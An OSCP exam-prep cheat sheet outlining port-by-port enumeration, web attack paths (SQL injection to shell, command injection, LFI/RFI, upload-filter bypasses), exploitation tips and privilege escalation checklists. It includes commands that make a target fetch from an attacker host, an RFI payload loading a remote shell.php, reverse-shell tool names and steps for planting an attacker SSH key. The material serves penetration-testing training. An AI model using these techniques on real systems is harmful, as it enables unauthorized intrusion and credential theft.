OSCP Guide

Network Enum
1. 21/FTP
  1. Anonymous Login
    1. File Read
      1. Possible Any confidential Information
    2. File Write
      1. Possible Filewrite to access through Web
      2. FTP to file upload ==> Execute from web == webshell
  2. Password Checking if you found with other enum
    1. maybe brute-force
2. 22/SSH
  1. Password Checking if you found with other enum
  2. No Brute-Force 99.99%
3. 25/SMTP
  1. Username Enumration which can be chained to other vulnerability
4. 80|443/HTTP/S
  1. Gobuster
    1. DIR
      1. For finding hidden directories and files
    2. DNS
      1. For finding Subdomains
  2. NIKTO
    1. Having quick information for the web stuff
5. 139|445/SMB
  1. Null Session
    1. Read Permission
      1. Possible Confidential file to be available
    2. Write Permission
      1. Possible file uplaod to execute through web service
    3. Tools
      1. smbmap
      2. For checking What are the shares to available with permission information
      3. smbclient
      4. For connecting to SMB server for accessing those shares which are available to access
  2. Guest Session
    1. Read Permission
      1. Possible Confidential file to be available
    2. Write Permission
      1. Possible file uplaod to execute through web service
    3. Tools
      1. smbmap
      2. For checking What are the shares to available with permission information
      3. smbclient
      4. For connecting to SMB server for accessing those shares which are available to access
  3. Accessing Without Creds
  4. Accessing with any username
6. 135/RPC
  1. USERname Enumaration
  2. Tool
    1. RPCCLIENT
7. 2049/NFS
  1. Open NFS share
    1. Read Access
      1. Possible Confidential file to be available
    2. Write Access
      1. Possible file uplaod to execute through web service
    3. Tools
      1. mount
      2. For mounting Share available
      3. showmount
      4. For finding shares available
8. 3306/MYSQL
  1. If not (Unauthorized)
    1. Try login without password
    2. can be used for checking passwords found via diffrent service
    3. Tools
      1. mysql (Client)
9. 5985|5986/WINRM/S
  1. Remotly Windows Machine Access
    1. With Password
    2. With Hash
  2. Evil-Winrm(Tool)
10. 3389/RDP
  1. try login with creds you have.
  2. use different clients like remmina if you see any errors with other client
  3. If logged in share folder to transfer files through remmina
11. 161/SNMP
  1. Access Critical information about target system
  2. Tools
    1. snmp-check
    2. snmpwalk
12. 53/DNS
  1. Can be used for getting information about subdomains
13. rpcclient -U '%' -N <IP>
Web-Enum
1. Vulnerabilities Specific
  1. SQLinjection
    1. TO SHELL
      1. FILE Pemission
      2. By Reading Files
      3. SSH Private Keys
      4. To get information about users read /etc/passwd
      5. PayloadAllTheThings LFI list for finding other critical information
      6. Function
      7. LOAD_FILE('<FILE LOCATION>')
      8. By Writing Files
      9. Webshell Writing in Web-Hosting Directory
      10. For Windows use \\<Attacker IP>\sharename\anyfilename to get hash for the user
      11. Function
      12. into dumpfile '<FILE LOCATION>'
      13. into outfile '<FILE LOCATION>'
      14. Ascii mode
      15. Binary Mode
      16. Webshells which can be used
      17. Windows
      18. Oneliner
      19. P0wnyShell
      20. b374k
      21. Priority
      22. Linux
      23. Oneliner
      24. P0wnyShell
      25. b374k
      26. Priority
      27. To Find WebHosting Directory Use LFI list
      28. Responder tool
    2. To Get Information about Databases,Tables
      1. Find Username password & try same with other services like ssh,winrm,etc
  2. Command Injection
    1. Check
      1. Vulnerability Exist
      2. Windows
      3. Attacker
      4. tcpdump -i <tun0> -n ICMP
      5. Target
      6. Ping -c 1 <Attacker IP>
      7. Linux
      8. Attacker
      9. tcpdump -i <tun0> -n ICMP
      10. Target
      11. Ping -n 1 <Attacker IP>
      12. Port which can be used for Getting LAN shell
      13. Windows
      14. Attacker
      15. Python3 -m http.server <PORT to test>
      16. Target
      17. Powershell wget http://<AttackerIP:PORT/test>
      18. Linux
      19. Attacker
      20. Python3 -m http.server <PORT to test>
      21. Target
      22. wget http://<Attacker IP>:PORT/test
      23. curl http://<Attacker IP>:PORT/test
      24. Common Ports which works all the time
      25. Windows
      26. 21,22,25,80,443,445,53,123
      27. Priority 445
      28. Linux
      29. 21,22,25,80,443,445,53,123
      30. Priority 22
      31. If recived connection to the port use that for getting reverse shell
    2. Exploit
      1. Web-shell method
      2. Use wget command to write a web-shell to the web-hosting directory
      3. Using Curl command Writing Web-shell in web-hosting directory
      4. LAN-Shell Method
      5. After Checking if ping is working and port connection verified (IMP)
      6. Windows
      7. mkpsrevshell
      8. Powershell Nishang shell
      9. nc.exe upload
      10. Linux
      11. nc
      12. python
      13. ruby
      14. bash
      15. many
      16. Google Linux Reverse Shell CheetSheet
      17. SSH method
      18. only works if user is not daemon (service user like apache or www-data)
      19. Upload public key of attacker to /home/<USER>/.ssh/authorized_keys
      20. if folder is not exist create it ;)
  3. LFI
    1. TO SHELL
      1. log poisioning
      2. Try to access logs for the diffrent serivces running i.e ftp,smb,http
      3. If any of the log file is accesibble check if your input is reflacting
      4. to get log files location use LFI list
      5. Session Poisioning
      6. Try accessing session file
      7. To get session file location
      8. Payload All The things
      9. <?php echo session_save_path(); ?>
      10. On any linux Machines
      11. Add your session id (IMP)
      12. Read your cookie value and modify same with file name
    2. Reading Confidential File
      1. SSH Private Key
      2. For getting user location read /etc/passwd
      3. Config Files
      4. Use payloadallthethings LFI list
  4. RFI
    1. Start with
      1. Port which can be used for Getting LAN shell
      2. Windows
      3. Attacker
      4. Python3 -m http.server <PORT to test>
      5. Target
      6. change RFI param value to http://<Attacker_IP:PORT>/test
      7. Linux
      8. Attacker
      9. Python3 -m http.server <PORT to test>
      10. Target
      11. change RFI param value to http://<Attacker_IP:PORT>/test
      12. Common Ports which works all the time
      13. Windows
      14. 21,22,25,80,443,445,53,123
      15. Priority 445
      16. Linux
      17. 21,22,25,80,443,445,53,123
      18. Priority 22
    2. Once Port found to be used
      1. Windows
      2. Google windows php reverse shell and use that
      3. Oneliner
      4. best
      5. Linux
      6. google Linux php reverse shell and use that
      7. Oneliner
      8. best
      9. TIPS
      10. payload should be
      11. http://<Attacker_IP>:<PORT>/shell.php&cmd=whoami
      12. payload should not be
      13. http://<Attacker_IP>:<PORT>/shell.php?cmd=whoami
      14. ? And & makes a huge diffrence
  5. File Upload
    1. Uploading File
      1. php
      2. shells
      3. oneliner
      4. p0wny
      5. b374k
      6. msfvenom
      7. bypasses
      8. magic bytes bypass
      9. Modify first few bytes or signature with png signature
      10. file extension bypass AKA double extensions
      11. use double extension as below
      12. php.png
      13. php,jpeg
      14. php.gif
      15. Similar extensions
      16. php/php4/php5/phtml
      17. File Size check (client check only)
      18. If data sends file size param modify value to something which is higer
      19. use oneliner or smaller shells
      20. Content type Check
      21. Intercept request through burp
      22. Check for the content type header and modify as below
      23. image/png
      24. image/jpeg
      25. image/gif
      26. text/plain
      27. asp/aspx
      28. Shells
      29. Google ASPX shell and use those webshell and follow web-shell to lan shell method as shows earlier
      30. create ASP/X reverse shell with msfvenom
      31. Bypasses
      32. Content type Check
      33. Intercept request through burp
      34. Check for the content type header and modify as below
      35. image/png
      36. image/jpeg
      37. image/gif
      38. text/plain
      39. File Size check (client check only)
      40. If data sends file size param modify value to something which is higer
      41. use oneliner or smaller shells
      42. jsp
      43. Shells
      44. Google jsp shell and use those webshell and follow web-shell to lan shell method as shows earlier
      45. Bypasses
      46. Create JSP shell with msfvenom and use that
      47. For Apache Tomcat
      48. Windows IIS server
      49. WIndows IIS & Apacher httpd
    2. Accesing File
      1. gobuster
      2. Do a dictionary based attack to find all the hidden directory
      3. gobuster dir -w <wordlist> -u http://<IP>:PORT/ -t 100
      4. ffuf
      5. Do fuzzing with dictionary based attack
      6. ffuf -w <wordlist -u http://<IP:PORT>/FUZZ/filename_you_uploaded.php -t 100 -fc 200
      7. Best Directory wordlist
      8. seclist
      9. directory list 2-3 big.txt
      10. raft wordlist
      11. wordlist
      12. dirbuster directory list 2.3 big or medium
2. CMS
  1. Finding
    1. Source Code
    2. Login page
    3. Comments
  2. Validating
    1. Dont use any exploit which is related to xss/xsrf and so on focus on vulnerability which i mentioned up
    2. Try finding github exploits as those are better sometimes
    3. Don't trust versions everytime
  3. Exploiting
    1. validate first
    2. use right port to get LAN shell
    3. follow earlier topic checks and validation
3. Wordpress
  1. WPscan
    1. read manual
4. Other
  1. Custom exploits takes place here you might have to find vulnerability on your own from the list above
  2. X-Forwarded-For to accesing 403 page
Exploitation
1. Modifications
  1. Automated Exploits
    1. Path Sometimes Changed
    2. using Alternative command (SHELLCODE)
    3. Making Dev-Exploits to final
    4. Solving errors
    5. Sometime Exploits Contains proxies configurations
  2. Instruction Based Exploits
    1. Find Automated one
    2. read and understand complete
    3. use logics as most of the time instruction based exploits requires to fully understand concepts
    4. Needs less modifications but it requires like. changing path or maybe finding path
2. Finding Alternatives
  1. Search on google with CVE number and find blogs, exploits from github, papers etc.
  2. searchsploit will help for quick list all thoses
3. Exploiting With right way
  1. try all exploits if no version information disclosed as sometimes its obfuscated
  2. Focus on critical vulnerabilities more
4. BufferOverflow
  1. Practice more on Vanilla B0f AKA stack based b0f
Privilege Escalation
1. Windows
  1. Manual Approaches
    1. 1) Check low privilege Shell permission (whoami /priv) and try exploiting vuln X
    2. 2) Check Software Installation Directory And find suspecious programs that are installed
    3. 3) Check for Weak permissions in services and its binpath
    4. 4) Check for Unquoted Service Path Vulnerability
    5. 5) Check For Service Registry permissions
    6. 6) Check Scheduled Tasks
    7. Read Names carefully
  2. Automated (best for beginners)
    1. PowerUp
    2. WinPEAS
    3. Windows exploit suggester.
    4. Fails to Check Vulnerable Softwares
    5. its like using sword for sewing ......
    6. sometimes creator forgot to use latest OS and this can be a luck time for you and you might find something.
2. Unix
  1. Manual Approaches
    1. Check For Sudoers Misconfigurations
    2. Check For SUID permissions
    3. Check Services Running on root
    4. Check Internal Ports
    5. Check ports blocked by firewall
    6. Check Kernal Version and exploits
    7. keep eyes on 127.0.0.1
    8. compare with nmap result you have
  2. Automated (best for beginners)
    1. LSE (best)
    2. linPEAS
    3. lin Enum
    4. Its allowed for enumeration but not for exploitation and in recent changes of linpeas it has implemented exploitation too which is not allowed. so simple find vuln and exploit that manually (not just by execution linpeas).
linkedin.com/in/rikunj/
Telegram: https://t.me/R0B077
Changelogs. 1) added ref links on each topics 2) minor changes 3) added couple more vuln and enum